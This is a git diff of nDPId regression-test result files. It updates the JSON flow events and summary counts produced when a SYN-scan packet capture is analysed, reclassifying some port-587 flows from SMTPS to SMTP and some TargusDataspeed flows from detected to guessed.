00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AACcGKcSsEAAIQA2GNIzSE4ndUoMYAAAAAGACEAAVBgAAAgQFtA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsirUAADEGjL2sEAAIQA2GNIzSH\/XdUoMYAAAAAGACCAAQmgAAAgQFtA=="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -1630,7 +1629,6 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5EAACoGXuGsEAAIQA2GNIzTH\/XdU4MZAAAAAGACDAAMlwAAAgQFtA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsciYAADQGokysEAAIQA2GNIzTE4ndU4MZAAAAAGACBAAhAwAAAgQFtA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs7U0AACoGMSWsEAAIQA2GNIzTBDDdU4MZAAAAAGACDAAoXAAAAgQFtA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -6371,9 +6369,9 @@ 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -6849,10 +6847,12 @@ 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -7987,18 +7987,18 @@ 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","packets-captured":2011,"packets-processed":2011,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":1876,"total-guessed-flows":116,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1994,"total-idle-flows":1994,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7990,"global_ts_msec":1278275079360} +00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","packets-captured":2011,"packets-processed":2011,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":1876,"total-guessed-flows":118,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1994,"total-idle-flows":1994,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7990,"global_ts_msec":1278275079360} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2011/2011 ~~ skipped flows.............: 0 ~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 2 +~~ total detected protocols..: 0 ~~ total active/idle flows...: 1994/1994 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 8040362 bytes -~~ total memory freed........: 8040362 bytes -~~ total allocations/frees...: 128099/128099 +~~ total memory allocated....: 8173996 bytes +~~ total memory freed........: 8173996 bytes +~~ total allocations/frees...: 130861/130861 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 820 chars diff --git a/test/results/syslog.pcap.out b/test/results/syslog.pcap.out index 9e432f4bc..e47d1dce5 100644 --- a/test/results/syslog.pcap.out +++ b/test/results/syslog.pcap.out @@ -6,27 +6,27 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":3,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":6,"global_ts_msec":1377043331844} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1377043331844,"flow_last_seen":1377043331844,"flow_idle_time":200000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1377043331844,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 